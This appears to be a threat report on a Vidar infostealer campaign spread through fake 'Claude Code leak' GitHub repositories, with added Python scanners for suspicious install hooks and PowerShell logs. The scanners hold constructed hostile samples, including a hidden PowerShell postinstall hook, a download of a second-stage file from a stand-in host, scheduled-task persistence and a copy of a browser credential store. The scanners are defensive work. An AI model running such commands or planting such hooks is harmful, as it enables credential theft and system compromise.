Vidar Campaign Exploits Claude Code Source Leak
Cybercriminals launched a sophisticated malware campaign on April 2, 2026, exploiting the recent leak of Anthropic's Claude Code source code to distribute Vidar information-stealing malware. The attackers created multiple fake GitHub repositories claiming to contain the leaked Claude AI development framework, targeting developers and security researchers eager to examine the proprietary code.
The malicious campaign began within hours of the Claude Code leak becoming public knowledge. Threat actors quickly registered GitHub accounts with names closely resembling legitimate Anthropic developers and created repositories with convincing titles like "claude-code-official-leak" and "anthropic-claude-source-mirror." These repositories contained what appeared to be legitimate source code files alongside hidden malware payloads disguised as build scripts and dependency files.
Security researchers from The Hacker News first identified the campaign after detecting suspicious download patterns from newly created GitHub repositories. The attackers employed social engineering tactics by posting links to their malicious repositories in developer forums, Discord channels, and social media platforms where discussions about the Claude Code leak were trending.
The Vidar malware variant used in this campaign includes enhanced capabilities specifically designed to target development environments. Unlike standard Vidar deployments, this version actively searches for API keys, development certificates, and source code repositories stored on infected systems. The malware also attempts to steal credentials from popular development tools including Visual Studio Code, JetBrains IDEs, and Git credential managers.
Analysis of the malicious repositories reveals sophisticated obfuscation techniques. The attackers embedded the Vidar payload within seemingly legitimate Python setup scripts and Node.js package files. When developers attempt to run or analyze the "leaked" code, these scripts execute silently in the background, establishing persistence on the target system and beginning the data exfiltration process.
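The passage above describes payloads hidden in Python setup scripts and Node.js package files, which run automatically on `pip install .` or `npm install`. The following is an added example, not code from the article or from any of the projects it mentions, of a pre-install check a developer can run over a cloned repository before building it: it parses `package.json` lifecycle hooks and `setup.py` for the behaviours the article attributes to the stager (PowerShell invocation, hidden-window and bypass flags, encoded arguments, remote downloads, persistence). The file names, the pattern list and the sample contents are assumptions constructed for the example; the heuristics are pattern-based and meant for triage, not as proof of compromise.

```python
import json
import re

# Hooks that npm runs without any further user action during `npm install`.
NPM_LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Behaviours that have no place in the build hook of a "source mirror" repository.
SUSPICIOUS = [
    (re.compile(r"powershell|pwsh", re.I), "invokes PowerShell"),
    (re.compile(r"-enc(odedcommand)?\b|FromBase64String|b64decode", re.I), "base64-encoded payload"),
    (re.compile(r"Invoke-WebRequest|DownloadString|DownloadFile|\bcurl\b|\bwget\b|urllib|requests\.get", re.I),
     "downloads remote content"),
    (re.compile(r"-w(indowstyle)?\s+hidden|-nop(rofile)?\b|-ExecutionPolicy\s+Bypass", re.I),
     "hidden/bypass PowerShell flags"),
    (re.compile(r"schtasks|Register-ScheduledTask|CurrentVersion\\Run", re.I), "sets up persistence"),
]

# Calls that let setup.py spawn a process or run dynamic code at install time.
PY_EXEC_CALLS = re.compile(r"subprocess\.|os\.system|os\.popen|\bexec\(|\beval\(")


def classify(text):
    """Return the list of suspicious-behaviour reasons matched by `text`, in SUSPICIOUS order."""
    return [reason for pattern, reason in SUSPICIOUS if pattern.search(text)]


def scan_package_json(content):
    """Flag npm lifecycle hooks; every such hook is worth a look, matching ones are explained."""
    findings = []
    try:
        data = json.loads(content)
    except json.JSONDecodeError:
        return [("package.json", "-", "unparseable JSON, review manually")]
    for hook, cmd in data.get("scripts", {}).items():
        if hook not in NPM_LIFECYCLE_HOOKS:
            continue
        reasons = classify(cmd) or ["lifecycle hook runs automatically on install"]
        findings.append(("package.json", hook, "; ".join(reasons)))
    return findings


def scan_setup_py(content):
    """Flag custom install commands and any line that spawns a process or runs dynamic code."""
    findings = []
    if "cmdclass" in content:
        findings.append(("setup.py", "cmdclass", "custom install command overrides pip's install step"))
    for lineno, line in enumerate(content.splitlines(), 1):
        if PY_EXEC_CALLS.search(line):
            reasons = classify(line) or ["spawns a process at install time"]
            findings.append(("setup.py", f"line {lineno}", "; ".join(reasons)))
    return findings


def scan_repository(files):
    """`files` maps a file name to its text; only the two install-time manifests are inspected."""
    findings = []
    if "package.json" in files:
        findings += scan_package_json(files["package.json"])
    if "setup.py" in files:
        findings += scan_setup_py(files["setup.py"])
    return findings


# Constructed sample manifests (not taken from any real repository).
CLEAN_REPO = {
    "package.json": '{"name": "claude-code", "scripts": {"build": "tsc", "test": "vitest"}}',
    "setup.py": 'from setuptools import setup\nsetup(name="claude-code")\n',
}

SUSPECT_REPO = {
    "package.json": json.dumps({"name": "claude-code", "scripts": {
        "build": "tsc",
        "postinstall": "powershell -NoProfile -WindowStyle Hidden -File build/deps.ps1",
    }}),
    "setup.py": "\n".join([
        "from setuptools import setup",
        "from setuptools.command.install import install",
        "import subprocess",
        "",
        "class PostInstall(install):",
        "    def run(self):",
        "        install.run(self)",
        '        subprocess.run(["powershell", "-EncodedCommand", "<placeholder>"])',
        "",
        'setup(name="claude-code", cmdclass={"install": PostInstall})',
    ]),
}

if __name__ == "__main__":
    for name, repo in (("clean", CLEAN_REPO), ("suspect", SUSPECT_REPO)):
        print(name, scan_repository(repo))
```

The check is deliberately conservative: any npm lifecycle hook is reported even when no pattern fires, because the hook itself is the capability the stager needs. A real `setup.py` can hide the same behaviour behind indirection (imported helpers, string concatenation), so a clean result means "nothing obvious", and the safer course for a repository like the ones described above is to read it in an isolated VM rather than run `pip install` or `npm install` on a development workstation.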
Developer Community and Enterprise Development Teams at Risk
The primary targets of this campaign are software developers, AI researchers, and security professionals interested in examining the leaked Claude Code. Organizations with development teams actively researching large language model implementations face particular risk, as employees may attempt to download and analyze the supposedly leaked source code for competitive intelligence or security research purposes.
Enterprise environments running Windows 10 and Windows 11 workstations are most vulnerable to the Vidar payload. The malware specifically targets development workstations with elevated privileges, making it particularly dangerous for organizations where developers have administrative access to their systems. Companies in the artificial intelligence, machine learning, and software development sectors represent high-value targets due to the sensitive intellectual property and API credentials typically stored on developer machines.
The campaign has already compromised an estimated 2,400 systems based on command-and-control server telemetry observed by security researchers. Affected organizations span multiple industries, with technology companies, financial services firms, and government contractors reporting suspicious activity consistent with Vidar infections. The malware's focus on development environments means that compromised systems often contain access to production repositories, cloud development platforms, and sensitive customer data.
Small to medium-sized development teams face heightened risk due to limited security controls and monitoring capabilities. Many smaller organizations lack the endpoint detection and response tools necessary to identify Vidar's stealthy installation and data collection activities. The malware's ability to steal stored credentials and API keys can lead to secondary compromises of cloud infrastructure and customer systems.
Vidar Infection Chain and Immediate Response Actions
The Vidar malware deploys through a multi-stage infection process that begins when users download and execute files from the malicious GitHub repositories. The initial payload masquerades as a Python requirements installer or Node.js dependency manager, executing PowerShell commands that download additional components from compromised WordPress sites and legitimate cloud storage services.
Organizations should immediately block, at the network level, the known Vidar command-and-control domains identified in the campaign. Security teams must monitor for outbound connections to suspicious domains and implement application allowlisting to prevent unauthorized executables from running on development workstations. SecurityWeek reports that the malware communicates with its C2 servers over encrypted HTTPS traffic, which makes detection harder without TLS inspection capability.
Immediate mitigation steps include scanning all development workstations for indicators of compromise, particularly focusing on systems where users may have downloaded files related to the Claude Code leak. IT administrators should check for the presence of suspicious PowerShell execution logs, unusual network traffic patterns, and unauthorized modifications to browser credential stores. The malware creates persistence through scheduled tasks and registry modifications that can be detected using standard endpoint monitoring tools.
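The two paragraphs above describe both the infection chain (an install script runs PowerShell, which downloads further components and sets up persistence) and the evidence it leaves (PowerShell execution logs, scheduled tasks, registry modifications, browser credential stores). The following is an added example, not tooling from the article or any vendor it cites, of triage logic over PowerShell script-block events (Event ID 4104 from the Microsoft-Windows-PowerShell/Operational log, assumed to have been exported per host with a timestamp and the script text). It tags each script block by behaviour and raises a host to "stager-chain" when a download and a persistence step occur within a short window, which is the ordering the article gives for the multi-stage install. The event records, host names, timestamps and patterns are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# One tag per stage of the behaviour described for the stager. Script-block
# logging records the de-obfuscated text, so plain patterns are usable here.
TAGS = [
    ("download", re.compile(
        r"Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadFile|Start-BitsTransfer|\bcurl\b", re.I)),
    ("encoded", re.compile(r"-(e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}|FromBase64String", re.I)),
    ("persistence", re.compile(r"schtasks(\.exe)?\s+/create|Register-ScheduledTask|CurrentVersion\\Run", re.I)),
    ("cred_store", re.compile(r"Login Data|logins\.json|key4\.db|Local State|\.git-credentials", re.I)),
    ("hidden", re.compile(r"-w(indowstyle)?\s+hidden|-ExecutionPolicy\s+Bypass", re.I)),
]


def tag_script_block(text):
    """Return the behaviour tags a single script block matches, in TAGS order."""
    return [name for name, pattern in TAGS if pattern.search(text)]


def triage(events, window_minutes=15):
    """Group 4104 events by host and return {host: {"verdict": ..., "tags": [...]}}.

    'stager-chain' means a download and a persistence step happened within
    `window_minutes` of each other on that host; 'review' means some tag fired
    without that pairing; 'clean' means nothing matched.
    """
    per_host = defaultdict(list)
    hosts = set()
    for ev in events:
        hosts.add(ev["host"])
        tags = tag_script_block(ev["script"])
        if tags:
            per_host[ev["host"]].append((datetime.fromisoformat(ev["time"]), tags))

    window = timedelta(minutes=window_minutes)
    results = {}
    for host in sorted(hosts):
        hits = sorted(per_host.get(host, []), key=lambda h: h[0])
        all_tags = sorted({t for _, tags in hits for t in tags})
        downloads = [ts for ts, tags in hits if "download" in tags]
        persists = [ts for ts, tags in hits if "persistence" in tags]
        chained = any(abs(p - d) <= window for d in downloads for p in persists)
        verdict = "stager-chain" if chained else ("review" if all_tags else "clean")
        results[host] = {"verdict": verdict, "tags": all_tags}
    return results


# Constructed sample export of 4104 events (host, time, script block text); not real telemetry.
SAMPLE_EVENTS = [
    {"host": "DEV-WS-01", "time": "2026-04-02T09:14:05",
     "script": "Get-ChildItem -Recurse *.py | Measure-Object"},
    {"host": "DEV-WS-07", "time": "2026-04-02T10:02:11",
     "script": r'Invoke-WebRequest -Uri "https://example.invalid/stage2.bin" -OutFile "$env:TEMP\stage2.bin"'},
    {"host": "DEV-WS-07", "time": "2026-04-02T10:02:40",
     "script": r'schtasks /create /tn "NodeUpdate" /tr "$env:TEMP\stage2.bin" /sc onlogon'},
    {"host": "DEV-WS-07", "time": "2026-04-02T10:03:02",
     "script": r'Copy-Item "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data" $env:TEMP'},
    {"host": "DEV-WS-03", "time": "2026-04-02T11:30:00",
     "script": "Register-ScheduledTask -TaskName 'Backup' -Action $a -Trigger $t"},
]

if __name__ == "__main__":
    for host, result in triage(SAMPLE_EVENTS).items():
        print(host, result["verdict"], ", ".join(result["tags"]))
```

Script-block logging has to be enabled (via Group Policy or the `ScriptBlockLogging` registry policy) before the incident for these events to exist; where it is not, the scheduled tasks and Run-key entries the article mentions remain checkable directly on the host. A "review" verdict such as the lone `Register-ScheduledTask` on DEV-WS-03 is expected from legitimate administration and is why the chain rule, not any single tag, drives the escalation.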
For systems confirmed to be infected, organizations must assume that all stored credentials, API keys, and development certificates have been compromised. This requires immediate rotation of all development-related authentication tokens, revocation of potentially compromised certificates, and a comprehensive audit of code repositories for unauthorized access. Security teams should also add monitoring for any cloud resources reachable with the potentially stolen credentials, as Vidar specifically targets cloud platform access tokens and deployment keys.